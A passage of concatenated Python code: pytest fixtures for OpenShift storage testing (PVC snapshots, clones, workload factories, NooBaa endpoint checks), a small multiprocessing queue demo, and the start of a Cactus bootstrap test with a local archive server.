couchbase.run_workload(replicas=replicas, run_in_bg=run_in_bg)
# Run sanity check on data logs
couchbase.analyze_run(skip_analyze=skip_analyze)
return couchbase
def finalizer():
"""
Clean up
"""
couchbase.teardown()
request.addfinalizer(finalizer)
return factory
@pytest.fixture(scope="function")
def amq_factory_fixture(request):
"""
AMQ factory fixture
"""
amq = AMQ()
def factory(
sc_name,
kafka_namespace=constants.AMQ_NAMESPACE,
size=100,
replicas=3,
topic_name="my-topic",
user_name="my-user",
partitions=1,
topic_replicas=1,
num_of_producer_pods=1,
num_of_consumer_pods=1,
value="10000",
since_time=1800,
):
"""
Factory to start amq workload
Args:
sc_name (str): Name of storage clase
kafka_namespace (str): Namespace where kafka cluster to be created
size (int): Size of the storage
replicas (int): Number of kafka and zookeeper pods to be created
topic_name (str): Name of the topic to be created
user_name (str): Name of the user to be created
partitions (int): Number of partitions of topic
topic_replicas (int): Number of replicas of topic
num_of_producer_pods (int): Number of producer pods to be created
num_of_consumer_pods (int): Number of consumer pods to be created
value (str): Number of messages to be sent and received
since_time (int): Number of seconds to required to sent the msg
"""
# Setup kafka cluster
amq.setup_amq_cluster(
sc_name=sc_name, namespace=kafka_namespace, size=size, replicas=replicas
)
# Run open messages
amq.create_messaging_on_amq(
topic_name=topic_name,
user_name=user_name,
partitions=partitions,
replicas=topic_replicas,
num_of_producer_pods=num_of_producer_pods,
num_of_consumer_pods=num_of_consumer_pods,
value=value,
)
# Wait for some time to generate msg
waiting_time = 60
log.info(f"Waiting for {waiting_time}sec to generate msg")
time.sleep(waiting_time)
# Check messages are sent and received
threads = amq.run_in_bg(
namespace=kafka_namespace, value=value, since_time=since_time
)
return amq, threads
def finalizer():
"""
Clean up
"""
# Clean up
amq.cleanup()
request.addfinalizer(finalizer)
return factory
@pytest.fixture
def measurement_dir(tmp_path):
"""
Returns directory path where should be stored all results related
to measurement. If 'measurement_dir' is provided by config then use it,
otherwise new directory is generated.
Returns:
str: Path to measurement directory
"""
if config.ENV_DATA.get("measurement_dir"):
measurement_dir = config.ENV_DATA.get("measurement_dir")
log.info(f"Using measurement dir from configuration: {measurement_dir}")
else:
measurement_dir = os.path.join(os.path.dirname(tmp_path), "measurement_results")
if not os.path.exists(measurement_dir):
log.info(f"Measurement dir {measurement_dir} doesn't exist. Creating it.")
os.mkdir(measurement_dir)
return measurement_dir
@pytest.fixture()
def multi_dc_pod(multi_pvc_factory, dc_pod_factory, service_account_factory):
"""
Prepare multiple dc pods for the test
Returns:
list: Pod instances
"""
def factory(
num_of_pvcs=1,
pvc_size=100,
project=None,
access_mode="RWO",
pool_type="rbd",
timeout=60,
):
dict_modes = {
"RWO": "ReadWriteOnce",
"RWX": "ReadWriteMany",
"RWX-BLK": "ReadWriteMany-Block",
}
dict_types = {"rbd": "CephBlockPool", "cephfs": "CephFileSystem"}
if access_mode in "RWX-BLK" and pool_type in "rbd":
modes = dict_modes["RWX-BLK"]
create_rbd_block_rwx_pod = True
else:
modes = dict_modes[access_mode]
create_rbd_block_rwx_pod = False
pvc_objs = multi_pvc_factory(
interface=dict_types[pool_type],
access_modes=[modes],
size=pvc_size,
num_of_pvc=num_of_pvcs,
project=project,
timeout=timeout,
)
dc_pods = []
dc_pods_res = []
sa_obj = service_account_factory(project=project)
with ThreadPoolExecutor() as p:
for pvc_obj in pvc_objs:
if create_rbd_block_rwx_pod:
dc_pods_res.append(
p.submit(
dc_pod_factory,
interface=constants.CEPHBLOCKPOOL,
pvc=pvc_obj,
raw_block_pv=True,
sa_obj=sa_obj,
)
)
else:
dc_pods_res.append(
p.submit(
dc_pod_factory,
interface=dict_types[pool_type],
pvc=pvc_obj,
sa_obj=sa_obj,
)
)
for dc in dc_pods_res:
pod_obj = dc.result()
if create_rbd_block_rwx_pod:
log.info(
"#### setting attribute pod_type since "
f"create_rbd_block_rwx_pod = {create_rbd_block_rwx_pod}"
)
setattr(pod_obj, "pod_type", "rbd_block_rwx")
else:
setattr(pod_obj, "pod_type", "")
dc_pods.append(pod_obj)
with ThreadPoolExecutor() as p:
for dc in dc_pods:
p.submit(
helpers.wait_for_resource_state,
resource=dc,
state=constants.STATUS_RUNNING,
timeout=120,
)
return dc_pods
return factory
@pytest.fixture(scope="session")
def htpasswd_path(tmpdir_factory):
"""
Returns:
string: Path to HTPasswd file with additional usernames
"""
return str(tmpdir_factory.mktemp("idp_data").join("users.htpasswd"))
@pytest.fixture(scope="session")
def htpasswd_identity_provider(request):
"""
Creates HTPasswd Identity provider.
Returns:
object: OCS object representing OCP OAuth object with HTPasswd IdP
"""
users.create_htpasswd_idp()
cluster = OCS(kind=constants.OAUTH, metadata={"name": "cluster"})
cluster.reload()
def finalizer():
"""
Remove HTPasswd IdP
"""
# TODO(fbalak): remove HTPasswd identityProvider
# cluster.ocp.patch(
# resource_name='cluster',
# params=f'[{ "op": "remove", "path": "/spec/identityProviders" }]'
# )
# users.delete_htpasswd_secret()
request.addfinalizer(finalizer)
return cluster
@pytest.fixture(scope="function")
def user_factory(request, htpasswd_identity_provider, htpasswd_path):
return users.user_factory(request, htpasswd_path)
@pytest.fixture(scope="session")
def user_factory_session(request, htpasswd_identity_provider, htpasswd_path):
return users.user_factory(request, htpasswd_path)
@pytest.fixture(autouse=True)
def log_alerts(request):
"""
Log alerts at the beginning and end of each test case. At the end of test
case print a difference: what new alerts are in place after the test is
complete.
"""
teardown = config.RUN["cli_params"].get("teardown")
if teardown:
return
alerts_before = []
prometheus = None
try:
prometheus = PrometheusAPI()
except Exception:
log.exception("There was a problem with connecting to Prometheus")
def _collect_alerts():
try:
alerts_response = prometheus.get(
"alerts", payload={"silenced": False, "inhibited": False}
)
if alerts_response.ok:
alerts = alerts_response.json().get("data").get("alerts")
log.debug(f"Found alerts: {alerts}")
return alerts
else:
log.warning(
f"There was a problem with collecting alerts for analysis: {alerts_response.text}"
)
return False
except Exception:
log.exception("There was a problem with collecting alerts for analysis")
return False
def _print_diff():
if alerts_before:
alerts_after = _collect_alerts()
if alerts_after:
alerts_new = [
alert for alert in alerts_after if alert not in alerts_before
]
if alerts_new:
log.warning("During test were raised new alerts")
log.warning(alerts_new)
alerts_before = _collect_alerts()
request.addfinalizer(_print_diff)
@pytest.fixture(scope="session", autouse=True)
def ceph_toolbox(request):
"""
This fixture initiates ceph toolbox pod for manually created deployment
and if it does not already exist.
"""
deploy = config.RUN["cli_params"]["deploy"]
teardown = config.RUN["cli_params"].get("teardown")
skip_ocs = config.ENV_DATA["skip_ocs_deployment"]
deploy_teardown = deploy or teardown
ocp_dedicated = (
config.ENV_DATA["platform"].lower() == constants.OPENSHIFT_DEDICATED_PLATFORM
)
if not (deploy_teardown or skip_ocs) or (ocp_dedicated and not deploy_teardown):
try:
# Creating toolbox pod
setup_ceph_toolbox()
except CommandFailed:
log.info("Failed to create toolbox")
@pytest.fixture(scope="function")
def node_drain_teardown(request):
"""
Tear down function after Node drain
"""
def finalizer():
"""
Make sure that all cluster's nodes are in 'Ready' state and if not,
change them back to 'Ready' state by marking them as schedulable
"""
scheduling_disabled_nodes = [
n.name
for n in get_node_objs()
if n.ocp.get_resource_status(n.name)
== constants.NODE_READY_SCHEDULING_DISABLED
]
if scheduling_disabled_nodes:
schedule_nodes(scheduling_disabled_nodes)
ceph_health_check(tries=60)
request.addfinalizer(finalizer)
@pytest.fixture(scope="function")
def node_restart_teardown(request, nodes):
"""
Make sure all nodes are up again
Make sure that all cluster's nodes are in 'Ready' state and if not,
change them back to 'Ready' state by restarting the nodes
"""
def finalizer():
# Start the powered off nodes
nodes.restart_nodes_by_stop_and_start_teardown()
try:
node.wait_for_nodes_status(status=constants.NODE_READY)
except ResourceWrongStatusException:
# Restart the nodes if in NotReady state
not_ready_nodes = [
n
for n in node.get_node_objs()
if n.ocp.get_resource_status(n.name) == constants.NODE_NOT_READY
]
if not_ready_nodes:
log.info(
f"Nodes in NotReady status found: {[n.name for n in not_ready_nodes]}"
)
nodes.restart_nodes(not_ready_nodes)
node.wait_for_nodes_status(status=constants.NODE_READY)
request.addfinalizer(finalizer)
@pytest.fixture()
def mcg_connection_factory(request, mcg_obj, cld_mgr):
"""
Create a new MCG connection for given platform. If there already exists
a connection for the platform then return this previously created
connection.
"""
created_connections = {}
def _create_connection(platform=constants.AWS_PLATFORM, name=None):
"""
Args:
platform (str): Platform used for connection
name (str): New connection name. If not provided then new name will
be generated. New name will be used only if there is not
existing connection for given platform
Returns:
str: connection name
"""
if platform not in created_connections:
connection_name = name or create_unique_resource_name(
constants.MCG_CONNECTION, platform
)
mcg_obj.create_connection(cld_mgr, platform, connection_name)
created_connections[platform] = connection_name
return created_connections[platform]
def _connections_cleanup():
for platform in created_connections:
mcg_obj.delete_ns_connection(created_connections[platform])
request.addfinalizer(_connections_cleanup)
return _create_connection
@pytest.fixture()
def ns_resource_factory(
request, mcg_obj, cld_mgr, cloud_uls_factory, mcg_connection_factory
):
"""
Create a namespace resource factory. Calling this fixture creates a new namespace resource.
"""
created_ns_resources = []
def _create_ns_resources(platform=constants.AWS_PLATFORM):
# Create random connection_name
rand_connection = mcg_connection_factory(platform)
# Create the actual namespace resource
rand_ns_resource = create_unique_resource_name(
constants.MCG_NS_RESOURCE, platform
)
if platform == constants.RGW_PLATFORM:
region = None
else:
# TODO: fix this when https://github.com/red-hat-storage/ocs-ci/issues/3338
# is resolved
region = "us-east-2"
target_bucket_name = mcg_obj.create_namespace_resource(
rand_ns_resource,
rand_connection,
region,
cld_mgr,
cloud_uls_factory,
platform,
)
log.info(f"Check validity of NS resource {rand_ns_resource}")
if platform == constants.AWS_PLATFORM:
endpoint = constants.MCG_NS_AWS_ENDPOINT
elif platform == constants.AZURE_PLATFORM:
endpoint = constants.MCG_NS_AZURE_ENDPOINT
elif platform == constants.RGW_PLATFORM:
rgw_conn = RGW()
endpoint, _, _ = rgw_conn.get_credentials()
else:
raise UnsupportedPlatformError(f"Unsupported Platform: {platform}")
mcg_obj.check_ns_resource_validity(
rand_ns_resource, target_bucket_name, endpoint
)
created_ns_resources.append(rand_ns_resource)
return target_bucket_name, rand_ns_resource
def ns_resources_cleanup():
for ns_resource in created_ns_resources:
mcg_obj.delete_ns_resource(ns_resource)
request.addfinalizer(ns_resources_cleanup)
return _create_ns_resources
@pytest.fixture()
def namespace_store_factory(request, cld_mgr, mcg_obj, cloud_uls_factory):
"""
Create a Namespace Store factory.
Calling this fixture creates a new Namespace Store(s).
Returns:
func: Factory method - each call to this function creates
a namespacestore
"""
return namespacestore_factory_implementation(
request, cld_mgr, mcg_obj, cloud_uls_factory
)
@pytest.fixture(scope="session")
def namespace_store_factory_session(
request, cld_mgr, mcg_obj_session, cloud_uls_factory_session
):
"""
Create a Namespace Store factory.
Calling this fixture creates a new Namespace Store(s).
Returns:
func: Factory method - each call to this function creates
a namespacestore
"""
return namespacestore_factory_implementation(
request, cld_mgr, mcg_obj_session, cloud_uls_factory_session
)
@pytest.fixture()
def snapshot_factory(request):
"""
Snapshot factory. Calling this fixture creates a volume snapshot from the
specified PVC
"""
instances = []
def factory(pvc_obj, wait=True, snapshot_name=None):
"""
Args:
pvc_obj (PVC): PVC object from which snapshot has to be created
wait (bool): True to wait for snapshot to be ready, False otherwise
snapshot_name (str): Name to be provided for snapshot
Returns:
OCS: OCS instance of kind VolumeSnapshot
"""
snap_obj = pvc_obj.create_snapshot(snapshot_name=snapshot_name, wait=wait)
return snap_obj
def finalizer():
"""
Delete the snapshots
"""
snapcontent_objs = []
# Get VolumeSnapshotContent form VolumeSnapshots and delete
# VolumeSnapshots
for instance in instances:
if not instance.is_deleted:
snapcontent_objs.append(
helpers.get_snapshot_content_obj(snap_obj=instance)
)
instance.delete()
instance.ocp.wait_for_delete(instance.name)
# Wait for VolumeSnapshotContents to be deleted
for snapcontent_obj in snapcontent_objs:
snapcontent_obj.ocp.wait_for_delete(
resource_name=snapcontent_obj.name, timeout=240
)
request.addfinalizer(finalizer)
return factory
@pytest.fixture()
def multi_snapshot_factory(snapshot_factory):
"""
Snapshot factory. Calling this fixture creates volume snapshots of each
PVC in the provided list
"""
def factory(pvc_obj, wait=True, snapshot_name_suffix=None):
"""
Args:
pvc_obj (list): List PVC object from which snapshot has to be created
wait (bool): True to wait for snapshot to be ready, False otherwise
snapshot_name_suffix (str): Suffix to be added to snapshot
Returns:
OCS: List of OCS instances of kind VolumeSnapshot
"""
snapshot = []
for obj in pvc_obj:
log.info(f"Creating snapshot of PVC {obj.name}")
snapshot_name = (
f"{obj.name}-{snapshot_name_suffix}" if snapshot_name_suffix else None
)
snap_obj = snapshot_factory(
pvc_obj=obj, snapshot_name=snapshot_name, wait=wait
)
snapshot.append(snap_obj)
return snapshot
return factory
@pytest.fixture()
def snapshot_restore_factory(request):
"""
Snapshot restore factory. Calling this fixture creates new PVC out of the
specified VolumeSnapshot.
"""
instances = []
def factory(
snapshot_obj,
restore_pvc_name=None,
storageclass=None,
size=None,
volume_mode=None,
restore_pvc_yaml=None,
access_mode=constants.ACCESS_MODE_RWO,
status=constants.STATUS_BOUND,
):
"""
Args:
snapshot_obj (OCS): OCS instance of kind VolumeSnapshot which has
to be restored to new PVC
restore_pvc_name (str): Name to be provided for restored pvc
storageclass (str): Name of storageclass
size (str): Size of PVC being created. eg: 5Gi. Ideally, this
should be same as the restore size of snapshot. Adding this
parameter to consider negative test scenarios.
volume_mode (str): Volume mode for PVC. This should match the
volume mode of parent PVC.
restore_pvc_yaml (str): The location of pvc-restore.yaml
access_mode (str): This decides the access mode to be used for the
PVC. ReadWriteOnce is default.
status (str): If provided then factory waits for the PVC to reach
desired state.
Returns:
PVC: Restored PVC object
"""
snapshot_info = snapshot_obj.get()
size = size or snapshot_info["status"]["restoreSize"]
restore_pvc_name = restore_pvc_name or (
helpers.create_unique_resource_name(snapshot_obj.name, "restore")
)
if snapshot_info["spec"]["volumeSnapshotClassName"] == (
helpers.default_volumesnapshotclass(constants.CEPHBLOCKPOOL).name
):
storageclass = (
storageclass
or helpers.default_storage_class(constants.CEPHBLOCKPOOL).name
)
restore_pvc_yaml = restore_pvc_yaml or constants.CSI_RBD_PVC_RESTORE_YAML
interface = constants.CEPHBLOCKPOOL
elif snapshot_info["spec"]["volumeSnapshotClassName"] == (
helpers.default_volumesnapshotclass(constants.CEPHFILESYSTEM).name
):
storageclass = (
storageclass
or helpers.default_storage_class(constants.CEPHFILESYSTEM).name
)
restore_pvc_yaml = restore_pvc_yaml or constants.CSI_CEPHFS_PVC_RESTORE_YAML
interface = constants.CEPHFILESYSTEM
restored_pvc = create_restore_pvc(
sc_name=storageclass,
snap_name=snapshot_obj.name,
namespace=snapshot_obj.namespace,
size=size,
pvc_name=restore_pvc_name,
volume_mode=volume_mode,
restore_pvc_yaml=restore_pvc_yaml,
access_mode=access_mode,
)
instances.append(restored_pvc)
restored_pvc.snapshot = snapshot_obj
restored_pvc.interface = interface
if status:
helpers.wait_for_resource_state(restored_pvc, status)
return restored_pvc
def finalizer():
"""
Delete the PVCs
"""
pv_objs = []
# Get PV form PVC instances and delete PVCs
for instance in instances:
if not instance.is_deleted:
pv_objs.append(instance.backed_pv_obj)
instance.delete()
instance.ocp.wait_for_delete(instance.name)
# Wait for PVs to delete
helpers.wait_for_pv_delete(pv_objs)
request.addfinalizer(finalizer)
return factory
@pytest.fixture()
def multi_snapshot_restore_factory(snapshot_restore_factory):
"""
Snapshot restore factory. Calling this fixture creates set of new PVC out of the
each VolumeSnapshot provided in the list.
"""
def factory(
snapshot_obj,
restore_pvc_suffix=None,
storageclass=None,
size=None,
volume_mode=None,
restore_pvc_yaml=None,
access_mode=constants.ACCESS_MODE_RWO,
status=constants.STATUS_BOUND,
wait_each=False,
):
"""
Args:
snapshot_obj (list): List OCS instance of kind VolumeSnapshot which has
to be restored to new PVC
restore_pvc_suffix (str): Suffix to be added to pvc name
storageclass (str): Name of storageclass
size (str): Size of PVC being created. eg: 5Gi. Ideally, this
should be same as the restore size of snapshot. Adding this
parameter to consider negative test scenarios.
volume_mode (str): Volume mode for PVC. This should match the
volume mode of parent PVC.
restore_pvc_yaml (str): The location of pvc-restore.yaml
access_mode (str): This decides the access mode to be used for the
PVC. ReadWriteOnce is default.
status (str): If provided then factory waits for the PVC to reach
desired state.
wait_each(bool): True to wait for each PVC to be in status 'status'
before creating next PVC, False otherwise
Returns:
PVC: List of restored PVC object
"""
new_pvcs = []
status_tmp = status if wait_each else ""
for snap_obj in snapshot_obj:
log.info(f"Creating a PVC from snapshot {snap_obj.name}")
restore_pvc_name = (
f"{snap_obj.name}-{restore_pvc_suffix}" if restore_pvc_suffix else None
)
restored_pvc = snapshot_restore_factory(
snapshot_obj=snap_obj,
restore_pvc_name=restore_pvc_name,
storageclass=storageclass,
size=size,
volume_mode=volume_mode,
restore_pvc_yaml=restore_pvc_yaml,
access_mode=access_mode,
status=status_tmp,
)
restored_pvc.snapshot = snapshot_obj
new_pvcs.append(restored_pvc)
if status and not wait_each:
for restored_pvc in new_pvcs:
helpers.wait_for_resource_state(restored_pvc, status)
return new_pvcs
return factory
@pytest.fixture(scope="session", autouse=True)
def collect_logs_fixture(request):
"""
This fixture collects ocs logs after tier execution and this will allow
to see the cluster's status after the execution on all execution status options.
"""
def finalizer():
"""
Tracking both logs separately reduce changes of collision
"""
if not config.RUN["cli_params"].get("deploy") and not config.RUN[
"cli_params"
].get("teardown"):
if config.REPORTING["collect_logs_on_success_run"]:
collect_ocs_logs("testcases", ocs=False, status_failure=False)
collect_ocs_logs("testcases", ocp=False, status_failure=False)
request.addfinalizer(finalizer)
def get_ready_noobaa_endpoint_count(namespace):
"""
Get the number of ready nooobaa endpoints
"""
pods_info = get_pods_having_label(
label=constants.NOOBAA_ENDPOINT_POD_LABEL, namespace=namespace
)
ready_count = 0
for ep_info in pods_info:
container_statuses = ep_info.get("status", {}).get("containerStatuses")
if container_statuses is not None and len(container_statuses) > 0:
if container_statuses[0].get("ready"):
ready_count += 1
return ready_count
@pytest.fixture(scope="function")
def nb_ensure_endpoint_count(request):
"""
Validate and ensure the number of running noobaa endpoints
"""
cls = request.cls
min_ep_count = cls.MIN_ENDPOINT_COUNT
max_ep_count = cls.MAX_ENDPOINT_COUNT
assert min_ep_count <= max_ep_count
namespace = defaults.ROOK_CLUSTER_NAMESPACE
should_wait = False
# prior to 4.6 we configured the ep count directly on the noobaa cr.
if float(config.ENV_DATA["ocs_version"]) < 4.6:
noobaa = OCP(kind="noobaa", namespace=namespace)
resource = noobaa.get()["items"][0]
endpoints = resource.get("spec", {}).get("endpoints", {})
if endpoints.get("minCount", -1) != min_ep_count:
log.info(f"Changing minimum Noobaa endpoints to {min_ep_count}")
params = f'{{"spec":{{"endpoints":{{"minCount":{min_ep_count}}}}}}}'
noobaa.patch(resource_name="noobaa", params=params, format_type="merge")
should_wait = True
if endpoints.get("maxCount", -1) != max_ep_count:
log.info(f"Changing maximum Noobaa endpoints to {max_ep_count}")
params = f'{{"spec":{{"endpoints":{{"maxCount":{max_ep_count}}}}}}}'
noobaa.patch(resource_name="noobaa", params=params, format_type="merge")
should_wait = True
else:
storage_cluster = OCP(kind=constants.STORAGECLUSTER, namespace=namespace)
resource = storage_cluster.get()["items"][0]
resource_name = resource["metadata"]["name"]
endpoints = (
resource.get("spec", {}).get("multiCloudGateway", {}).get("endpoints", {})
)
if endpoints.get("minCount", -1) != min_ep_count:
log.info(f"Changing minimum Noobaa endpoints to {min_ep_count}")
params = f'{{"spec":{{"multiCloudGateway":{{"endpoints":{{"minCount":{min_ep_count}}}}}}}}}'
storage_cluster.patch(
resource_name=resource_name, params=params, format_type="merge"
)
should_wait = True
if endpoints.get("maxCount", -1) != max_ep_count:
log.info(f"Changing maximum Noobaa endpoints to {max_ep_count}")
params = f'{{"spec":{{"multiCloudGateway":{{"endpoints":{{"maxCount":{max_ep_count}}}}}}}}}'
storage_cluster.patch(
resource_name=resource_name, params=params, format_type="merge"
)
should_wait = True
if should_wait:
# Wait for the NooBaa endpoint pods to stabilize
try:
for ready_nb_ep_count in TimeoutSampler(
300, 30, get_ready_noobaa_endpoint_count, namespace
):
if min_ep_count <= ready_nb_ep_count <= max_ep_count:
log.info(
f"NooBaa endpoints stabilized. Ready endpoints: {ready_nb_ep_count}"
)
break
log.info(
f"Waiting for the NooBaa endpoints to stabilize. "
f"Current ready count: {ready_nb_ep_count}"
)
except TimeoutExpiredError:
raise TimeoutExpiredError(
"NooBaa endpoints did not stabilize in time.\n"
f"Min count: {min_ep_count}, max count: {max_ep_count}, ready count: {ready_nb_ep_count}"
)
@pytest.fixture()
def pvc_clone_factory(request):
"""
Calling this fixture creates a clone from the specified PVC
"""
instances = []
def factory(
pvc_obj,
status=constants.STATUS_BOUND,
clone_name=None,
storageclass=None,
size=None,
access_mode=None,
volume_mode=None,
):
"""
Args:
pvc_obj (PVC): PVC object from which clone has to be created
status (str): If provided then factory waits for cloned PVC to
reach the desired state
clone_name (str): Name to be provided for cloned PVC
storageclass (str): storage class to be used for cloned PVC
size (int): The requested size for the cloned PVC. This should
be same as the size of parent PVC for a successful clone
access_mode (str): This decides the access mode to be used for
the cloned PVC. eg: ReadWriteOnce, ReadOnlyMany, ReadWriteMany
volume_mode (str): Volume mode for PVC. This should match the
volume mode of parent PVC
Returns:
PVC: PVC instance
"""
assert (
pvc_obj.provisioner in constants.OCS_PROVISIONERS
), f"Unknown provisioner in PVC {pvc_obj.name}"
if pvc_obj.provisioner == "openshift-storage.rbd.csi.ceph.com":
clone_yaml = constants.CSI_RBD_PVC_CLONE_YAML
interface = constants.CEPHBLOCKPOOL
elif pvc_obj.provisioner == "openshift-storage.cephfs.csi.ceph.com":
clone_yaml = constants.CSI_CEPHFS_PVC_CLONE_YAML
interface = constants.CEPHFILESYSTEM
size = size or pvc_obj.get().get("spec").get("resources").get("requests").get(
"storage"
)
storageclass = storageclass or pvc_obj.backed_sc
access_mode = access_mode or pvc_obj.get_pvc_access_mode
volume_mode = volume_mode or getattr(pvc_obj, "volume_mode", None)
# Create clone
clone_pvc_obj = pvc.create_pvc_clone(
sc_name=storageclass,
parent_pvc=pvc_obj.name,
clone_yaml=clone_yaml,
pvc_name=clone_name,
storage_size=size,
access_mode=access_mode,
volume_mode=volume_mode,
)
instances.append(clone_pvc_obj)
clone_pvc_obj.parent = pvc_obj
clone_pvc_obj.volume_mode = volume_mode
clone_pvc_obj.interface = interface
if status:
helpers.wait_for_resource_state(clone_pvc_obj, status)
return clone_pvc_obj
def finalizer():
"""
Delete the cloned PVCs
"""
pv_objs = []
# Get PV form PVC instances and delete PVCs
for instance in instances:
if not instance.is_deleted:
pv_objs.append(instance.backed_pv_obj)
instance.delete()
instance.ocp.wait_for_delete(instance.name)
# Wait for PVs to delete
helpers.wait_for_pv_delete(pv_objs)
request.addfinalizer(finalizer)
return factory
@pytest.fixture(scope="session", autouse=True)
def reportportal_customization(request):
if hasattr(request.node.config, "py_test_service"):
rp_service = request.node.config.py_test_service
if not hasattr(rp_service.RP, "rp_client"):
request.config._metadata[
"RP Launch URL:"
] = "Problem with RP, launch URL is not available!"
return
launch_id = rp_service.RP.rp_client.launch_id
project = rp_service.RP.rp_client.project
endpoint = rp_service.RP.rp_client.endpoint
launch_url = f"{endpoint}/ui/#{project}/launches/all/{launch_id}/{launch_id}"
config.REPORTING["rp_launch_url"] = launch_url
config.REPORTING["rp_launch_id"] = launch_id
config.REPORTING["rp_endpoint"] = endpoint
config.REPORTING["rp_project"] = project
request.config._metadata["RP Launch URL:"] = launch_url
@pytest.fixture()
def multi_pvc_clone_factory(pvc_clone_factory):
"""
Calling this fixture creates clone from each PVC in the provided list of PVCs
"""
def factory(
pvc_obj,
status=constants.STATUS_BOUND,
clone_name=None,
storageclass=None,
size=None,
access_mode=None,
volume_mode=None,
wait_each=False,
):
"""
Args:
pvc_obj (list): List PVC object from which clone has to be created
status (str): If provided then factory waits for cloned PVC to
reach the desired state
clone_name (str): Name to be provided for cloned PVC
storageclass (str): storage class to be used for cloned PVC
size (int): The requested size for the cloned PVC. This should
be same as the size of parent PVC for a successful clone
access_mode (str): This decides the access mode to be used for
the cloned PVC. eg: ReadWriteOnce, ReadOnlyMany, ReadWriteMany
volume_mode (str): Volume mode for PVC. This should match the
volume mode of parent PVC
wait_each(bool): True to wait for each PVC to be in status 'status'
before creating next PVC, False otherwise
Returns:
PVC: List PVC instance
"""
cloned_pvcs = []
status_tmp = status if wait_each else ""
for obj in pvc_obj:
# Create clone
clone_pvc_obj = pvc_clone_factory(
pvc_obj=obj,
clone_name=clone_name,
storageclass=storageclass,
size=size,
access_mode=access_mode,
volume_mode=volume_mode,
status=status_tmp,
)
cloned_pvcs.append(clone_pvc_obj)
if status and not wait_each:
for cloned_pvc in cloned_pvcs:
helpers.wait_for_resource_state(cloned_pvc, status)
return cloned_pvcs
return factory
@pytest.fixture(scope="function")
def multiple_snapshot_and_clone_of_postgres_pvc_factory(
request,
multi_snapshot_factory,
multi_snapshot_restore_factory,
multi_pvc_clone_factory,
):
"""
Calling this fixture creates multiple snapshots & clone of postgres PVC
"""
instances = []
def factory(pvc_size_new, pgsql):
"""
Args:
pvc_size_new (int): Resize/Expand the pvc size
pgsql (obj): Pgsql obj
Returns:
Postgres pod: Pod instances
"""
# Get postgres pvc list obj
postgres_pvcs_obj = pgsql.get_postgres_pvc()
snapshots = multi_snapshot_factory(pvc_obj=postgres_pvcs_obj)
log.info("Created snapshots from all the PVCs and snapshots are in Ready state")
restored_pvc_objs = multi_snapshot_restore_factory(snapshot_obj=snapshots)
log.info("Created new PVCs from all the snapshots")
cloned_pvcs = multi_pvc_clone_factory(
pvc_obj=restored_pvc_objs, volume_mode=constants.VOLUME_MODE_FILESYSTEM
)
log.info("Created new PVCs from all restored volumes")
# Attach a new pgsql pod cloned pvcs
sset_list = pgsql.attach_pgsql_pod_to_claim_pvc(
pvc_objs=cloned_pvcs, postgres_name="postgres-clone", run_benchmark=False
)
instances.extend(sset_list)
# Resize cloned PVCs
for pvc_obj in cloned_pvcs:
log.info(f"Expanding size of PVC {pvc_obj.name} to {pvc_size_new}G")
pvc_obj.resize_pvc(pvc_size_new, True)
new_snapshots = multi_snapshot_factory(pvc_obj=cloned_pvcs)
log.info(
"Created snapshots from all the cloned PVCs"
" and snapshots are in Ready state"
)
new_restored_pvc_objs = multi_snapshot_restore_factory(
snapshot_obj=new_snapshots
)
log.info("Created new PVCs from all the snapshots and in Bound state")
# Attach a new pgsql pod restored pvcs
pgsql_obj_list = pgsql.attach_pgsql_pod_to_claim_pvc(
pvc_objs=new_restored_pvc_objs,
postgres_name="postgres-clone-restore",
run_benchmark=False,
)
instances.extend(pgsql_obj_list)
# Resize restored PVCs
for pvc_obj in new_restored_pvc_objs:
log.info(f"Expanding size of PVC {pvc_obj.name} to {pvc_size_new}G")
pvc_obj.resize_pvc(pvc_size_new, True)
return instances
def finalizer():
"""
Delete the list of pod objects created
"""
for instance in instances:
if not instance.is_deleted:
instance.delete()
instance.ocp.wait_for_delete(instance.name)
request.addfinalizer(finalizer)
return factory
@pytest.fixture()
def es(request):
"""
Create In-cluster elastic-search deployment for benchmark-operator tests.
using the name es - as shortcut for elastic-search for simplicity
"""
def teardown():
es.cleanup()
request.addfinalizer(teardown)
es = ElasticSearch()
return es
@pytest.fixture(scope="function")
def setup_ui(request):
driver = login_ui()
def finalizer():
close_browser(driver)
request.addfinalizer(finalizer)
return driver
@pytest.fixture(scope="session", autouse=True)
def load_cluster_info_file(request):
"""
This fixture tries to load cluster_info.json file if exists (on cluster
installed via Flexy) and apply the information to the config object (for
example related to disconnected cluster)
"""
load_cluster_info()
@pytest.fixture(scope="function")
def ripsaw(request):
# Create benchmark Operator (formerly ripsaw)
ripsaw = RipSaw()
def teardown():
ripsaw.cleanup()
time.sleep(10)
request.addfinalizer(teardown)
return ripsaw
|
main_queue_test.py
|
import multiprocessing
import keyboard
def getData(queue_raw):
#while True:
for num in range(1000):
queue_raw.put(num)
print("getData: put "+ str(num)+" in queue_raw")
def calcFeatures(queue_raw, queue_features):
while not queue_raw.empty():
data = queue_raw.get()
queue_features.put(data**2)
print("calcFeatures: put "+ str(data**2)+" in queue_features")
def sendFeatures(queue_features):
while True:
while not queue_features.empty():
feature = queue_features.get()
print("sendFeatures: put "+ str(feature)+" out")
if keyboard.read_key() == "p":
#print("You pressed p")
break
if __name__ == "__main__":
queue_raw = multiprocessing.Queue()
queue_features = multiprocessing.Queue()
processes = [
multiprocessing.Process(target=getData, args=(queue_raw,)),
multiprocessing.Process(target=calcFeatures, args=(queue_raw, queue_features,)),
multiprocessing.Process(target=sendFeatures, args=(queue_features,))
]
for p in processes:
p.start()
for p in processes:
p.join()
|
test_bootstrap.py
|
#coding:utf-8
import os
import shutil
import tarfile
import tempfile
import unittest
import zipfile
import threading
import random
from BaseHTTPServer import HTTPServer
from SimpleHTTPServer import SimpleHTTPRequestHandler
from cactus.bootstrap import bootstrap
from cactus.tests import BaseTestCase
from cactus.utils.filesystem import fileList
def ArchiveServerHandlerFactory(archive_path):
class ArchiveHandler(SimpleHTTPRequestHandler):
def do_GET(self):
"""
Reply with the archive.
"""
self.send_response(200)
self.end_headers()
with open(archive_path, 'rb') as f:
self.copyfile(f, self.wfile)
def log_request(self, code='-', size='-'):
"""
Discard log requests to clear up test output.
"""
return
return ArchiveHandler
class TestFolderBootstrap(BaseTestCase):
def test_bootstrap(self):
self.assertEqual(
sorted(fileList(self.path, relative=True)),
sorted(fileList("cactus/tests/data/skeleton", relative=True)),
)
class TestCactusPackageBootstrap(BaseTestCase):
def setUp(self):
self.test_dir = tempfile.mkdtemp()
self.path = os.path.join(self.test_dir, 'test')
self.clear_django_settings()
bootstrap(self.path)
def test_bootstrap(self):
self.assertEqual(
